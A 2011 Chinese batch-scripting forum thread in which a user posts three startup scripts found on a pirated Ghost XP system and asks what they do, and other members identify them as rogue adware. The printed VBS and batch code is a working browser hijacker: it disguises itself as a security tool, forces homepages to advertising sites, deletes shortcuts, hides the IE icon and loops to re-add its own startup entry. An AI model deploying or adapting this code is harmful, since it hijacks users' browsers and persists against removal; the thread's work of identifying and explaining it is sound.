[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖
ygqiang

Rank: 5Rank: 5

帖子
1284 
积分
726 
技术
13  
捐助
50  
注册时间
2010-4-18 
1 跳转到 » 倒序看帖
打印
tT
发表于 2011-7-5 11:28 | 只看该作者

[系统相关] [已解决]ghost版本的xp系统启动批处理起什么作用?

装了1个ghost版本的xp系统。

在注册表里的run启动项目里面,有个 36O安全卫士.vbs。这个文件路径是C:\WINDOWS  


36O安全卫士.vbs文件内容是:
  1. on error resume next

  2. DIM objShell

  3. set objShell=wscript.createObject("wscript.shell")

  4. iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\sys.bat", 0, TRUE)
复制代码
sys.bat文件内容是:
  1. @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f 

  2. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f

  3. @reg add "HKEY_USERs\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f

  4. @reg add "HKEY_USERs\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.5208.me/?5" /f

  5. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Favorites" /t REG_EXPAND_SZ   /d "C:\Documents and Settings\Administrator\Favorites"

  6. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Personal" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\My Documents"

  7. @reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Desktop" /t REG_EXPAND_SZ /d "C:\Documents and Settings\Administrator\桌面"

  8. wscript.exe C:\WINDOWS\s.vbs

  9. attrib C:\WINDOWS\RocketDock\Settings.ini +s +r +h

  10. @reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\run" /f /v "RocketDock" /t REG_SZ /d "C:\WINDOWS\RocketDock\RocketDock.exe"

  11. copy "C:\WINDOWS\zm\" "C:\Documents and Settings\All Users\桌面\" /y 

  12. del /f /s /q "%appdata%\Microsoft\Internet Explorer\Quick Launch\*.url"

  13. del /f /s /q "%appdata%\Microsoft\Internet Explorer\Quick Launch\*.lnk"

  14. copy "C:\WINDOWS\quick\" "%appdata%\Microsoft\Internet Explorer\Quick Launch\" /y 

  15. reg delete "HKEY_CLASSES_ROOT\InternetShortcut" /v IsShortcut /f

  16. copy "C:\WINDOWS\Favorites\" "c:\Documents and Settings\Administrator\Favorites\" /y  

  17. copy "C:\WINDOWS\Favorites\" "c:\Documents and Settings\All Users\Favorites\" /y  

  18. @reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions" /f 

  19. regedit -s C:\WINDOWS\gjl.reg

  20. copy "C:\WINDOWS\TheWorld\Internet Explorer.url" "C:\Documents and Settings\All Users\「开始」菜单\程序\" /y  

  21. @echo off

  22. :loop

  23. wscript.exe C:\WINDOWS\,.vbs

  24. @reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\run" /f /v "36O安全卫士" /t REG_SZ /d "C:\WINDOWS\36O安全卫士.vbs"

  25. ping 127.1 -n 10 >nul 2>nul

  26. goto loop
复制代码
C:\WINDOWS  下面还有个,.vbs,内容是:
  1. on error resume next

  2. DIM objShell,Fso,TxtFl,Str,re

  3. Set objShell = CreateObject("WScript.Shell")

  4. objShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"

  5. Set Fso = CreateObject("Scripting.FileSystemObject")

  6. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\360se\360SE.ini",1,False)

  7. Set re = new RegExp

  8. re.Pattern = "\s+HomePage=([\S\s]*?)\s+"

  9. re.Global = true

  10. re.IgnoreCase = true

  11. Str = re.Replace ( TxtFl.ReadAll,vbNewLine+"HomePage=http://www.2345li.com/?3"+vbNewLine)

  12. TxtFl.Close

  13. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\360se\360SE.ini",2,False)

  14. TxtFl.Write Str 

  15. TxtFl.Close

  16. 

  17. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Config.xml",1,True)

  18. Set re = new RegExp

  19. re.Pattern = "homepage=""([\S\s]*?)"""

  20. re.Global = true

  21. re.IgnoreCase = true

  22. Str = re.Replace ( TxtFl.ReadAll,"homepage=""http://www.2345li.com/?3""")

  23. re.Pattern = "homepagetype=""([\S\s]*?)"""

  24. Str = re.Replace ( Str,"homepagetype=""3""")

  25. TxtFl.Close

  26. Set TxtFl = Fso.OpenTextFile ("C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Config.xml",2,True)

  27. TxtFl.Write Str 

  28. TxtFl.Close
复制代码
1

评分人数

    • zm900612: 感谢给帖子标题标注[已解决]字样PB + 2
收藏 分享

ygqiang

Rank: 5Rank: 5

帖子
1284 
积分
726 
技术
13  
捐助
50  
注册时间
2010-4-18 
2
发表于 2011-7-5 11:28 | 只看该作者
请教下,这3个文件,都是起什么作用的?谢谢

TOP

Demon

Rank: 5Rank: 5

帖子
766 
积分
1451 
技术
117  
捐助
0  
注册时间
2010-5-12 
3
发表于 2011-7-5 11:49 | 只看该作者
起到流氓脚本的作用。
http://demon.tw

TOP

lxzzr

Rank: 8Rank: 8

帖子
682 
积分
1686 
技术
48  
捐助
0  
注册时间
2008-3-13 
4
发表于 2011-7-5 11:50 | 只看该作者
具备流氓性质...至少我看见会删掉的...

TOP

ygqiang

Rank: 5Rank: 5

帖子
1284 
积分
726 
技术
13  
捐助
50  
注册时间
2010-4-18 
5
发表于 2011-7-5 12:00 | 只看该作者
用360安全卫士杀掉的话,桌面就没有IE图标了啊。

TOP

CrLf

Rank: 8Rank: 8

帖子
6388 
积分
18843 
技术
982  
捐助
100  
注册时间
2010-10-9 
6
发表于 2011-7-5 12:02 | 只看该作者
第一个脚本启动第二脚本
第二个脚本改主页并把第一个脚本添加到启动项
第三个脚本改主页并创建伪装ie图标

貌似这样,畜生写的(对流氓脚本的作者不用客气)。
1

评分人数

链接:在线第三方命令行工具下载   bat、vbs、js 原生混编

TOP

Hello123World

Rank: 8Rank: 8

帖子
982 
积分
1525 
技术
78  
捐助
0  
注册时间
2010-10-23 
7
发表于 2011-7-6 16:30 | 只看该作者
你叫360情何以堪,那可是个老流氓变得。
如果用到sed命令,须下载sed.exe到c:\windows\system32文件夹中。

TOP

返回列表